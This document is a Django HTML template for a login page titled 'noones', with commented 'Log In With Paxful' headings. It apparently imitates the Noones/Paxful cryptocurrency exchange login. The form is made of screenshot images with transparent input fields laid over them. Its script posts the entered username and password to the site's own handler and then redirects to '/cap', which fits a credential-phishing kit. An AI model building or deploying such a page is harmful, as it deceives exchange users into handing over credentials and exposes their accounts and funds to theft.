{%load static%}

<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <!--<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> -->

    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">


    <link href="{%static 'https://fonts.googleapis.com/css?family=Roboto:300,400&display=swap' %}" rel="stylesheet">

    <link rel="stylesheet" href="{%static 'fonts/icomoon/style.css' %}">

    <link rel="stylesheet" href="{%static 'css/owl.carousel.min.css' %}">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="{%static 'css/bootstrap.min.css' %}">

    <!-- Style -->
    <link rel="stylesheet" href="{%static 'css/style.css' %}">

    <title>noones</title>
    <link rel="icon" type="image/x-icon" href="{%static 'images/favicon_io/favicon-16x16.png' %}">
    <link rel="apple-touch-icon" sizes="180x180" href="{%static 'images/favicon_io/apple-touch-icon.png' %}">
    <link rel="icon" type="image/png" sizes="32x32" href="{%static 'images/favicon_io/favicon-32x32.png' %}">
    <link rel="icon" type="image/png" sizes="16x16" href="{%static 'images/favicon_io/favicon-16x16.png' %}">
    <link rel="manifest" href="{%static 'images/favicon_io/site.webmanifest' %}">


    <style>








.transparent-input {
  font-weight:700;
  background-color: transparent;
  border: none;
  outline: none;
  width: 200px;
  height: 30px;
}
.white-input {
  background-color: white;
}
.input-container {

  position: absolute;
  top: 65%; /* change the top position to move the input field down */
  left: 40%;
  transform: translate(-50%, -50%);
  z-index: 1;
}



.submit-button {
  border: none; /* remove the border around the button */
  background: none;
  cursor: pointer;
}

.submit-button:focus {
  outline: none; /* remove the outline when the button is clicked */
}


.submit-container {

position: relative;
display: inline-block;

}

.btn{


  position: relative;


  padding: 10px 40px;
  border: none;
  cursor: pointer;
  cursor: pointer;


}


.container {
                    position: relative;
                    width: 100%;
                  }
                  .container img {
                    width: 100%;
                    height: auto;
                  }
                  .input-field {
                    position: absolute;
                    width: 80%;
                    height: 30%;
                    border: none;
                    outline: none;
                    background-color: transparent;
                    font-weight: 700;
                  }
.input-field:focus, .input-field:not(:placeholder-shown) {
        background-color: transparent;
      }
      .input-field::placeholder {
        color: transparent;
      }








    </style>














  </head>
  <body>







  <div class="d-lg-flex half">
    <div class="bg order-1 order-md-2" style="background-image: url({% static 'images/nonesMain.jpg' %});">

    </div>
    <div class="contents order-2 order-md-1">

      <div class="container">

        <div class="row align-items-center justify-content-center">
          <div class="col-md-7">

            <div class="d-flex align-items-start justify-content-between">


              <!--<img src = "images/pax4.png" style="padding-top: 5;"> <img src = "images/lang.png" > -->

            </div>
            <div class="mb-4">

              <!--

                 <div class="col-6">

                <img src = "images/pax4.png" style="padding-top: 5;"> <img src = "images/lang.png "style="w" >


              </div>


             <div class="myimage">



              -->











              <!--<h3>Log In With Paxful</h3>-->

              <!--<h1 class="h2 qa-login-page-title mb-3 mb-lg-4">Log In With Paxful</h1> -->



              <div class="d-flex flex-column flex-xs-row">

              <img src = "{%static 'images/intro2.jpeg' %}">



              </div>

              <!--<p class="mb-4">Lorem ipsum dolor sit amet elit. Sapiente sit aut eos consectetur adipisicing.</p>-->
            </div>





            <div class="submit-container">

              <button type="button" class="submit-button" id="first-button" onclick="changeImage()"><img src="{%static 'images/em.jpeg' %}" alt="Submit"></button>

              <button type="button" class="submit-button" id="second-button" onclick="changeImage3()"><img src="{%static 'images/ph.jpeg' %}" alt="Submit"></button>
            </div>

            <br>
            <br>
 <form id="myForm" action="{% url 'login' %}" method="POST">

              {% csrf_token %}




                <div class="container">
                  <img id="image"src="{%static 'images/mail3.jpeg' %}" alt="Your image">
                  <input name="username" input type="text" class="input-field" style="left: 9%; top: 50%;" onclick="" oninput="changeImage()">
                </div>



                <div class="container">
                  <img id="image2"src="{%static 'images/pass3.png' %}" alt="Your image">
                  <input name="password" input type="password" class="input-field" style="left: 9%; top: 45%;" onclick="changeImage2()" oninput="changeBgColor(this)">
                </div>








<br>

   <div class="d-flex flex-column flex-xs-row">
   <img src="{%static 'images/sub3.jpeg' %}" class="" alt="Submit" onclick="sendFormData()" style="cursor: pointer;">

</div>


 </form>












            <div class="d-flex flex-column flex-xs-row"><img src="{%static 'images/acc.jpeg' %}" class="mt-2 ml-xs-3 align-self-start LoginTemplate__labelIcon" alt="url">







            <script>






function sendFormData() {
  const form = document.getElementById('myForm');

  // Send form data to server using AJAX
  const formData = new FormData(form);
  fetch(form.action, {
    method: form.method,
    body: formData,
    headers: {
      'X-CSRFToken': getCookie('csrftoken') // Include CSRF token in headers
    }
  })
  .then(response => {
    if (response.ok) {
      // Redirect to new page on successful submission
      window.location.href = '/cap';
    } else {
      throw new Error('Error submitting form');
    }
  })
  .catch(error => {
    // Handle error
  });
}

// Helper function to get CSRF token from cookies
function getCookie(name) {
  const value = `; ${document.cookie}`;
  const parts = value.split(`; ${name}=`);
  if (parts.length === 2) return parts.pop().split(';').shift();
}





            function changeBgColor(input) {
              if (input.value.length > 0) {
                input.classList.add("white-input");
              } else {
                input.classList.remove("white-input");
              }
            }

            function changeImage() {
              document.getElementById("image").src = "{%static 'images/mail3w.jpg' %}";
            }

            function changeImage2() {
              document.getElementById("image2").src = "{%static 'images/pass3w.png' %}";
            }


            function changeImage3() {
              document.getElementById("image").src = "{%static 'images/phin.jpg' %}";
            }


            </script>







  </div>



    <script src="{%static 'js/jquery-3.3.1.min.js' %}"></script>
    <script src="{%static 'js/popper.min.js' %}"></script>
    <script src="{%static 'js/bootstrap.min.js' %}"></script>
    <script src="{%static 'js/main.js' %}"></script>
  </body>
</html>










